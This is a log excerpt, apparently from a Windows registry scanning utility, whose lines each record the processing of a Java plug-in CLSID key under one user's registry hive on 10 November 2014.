[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-FFFF-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBA}]
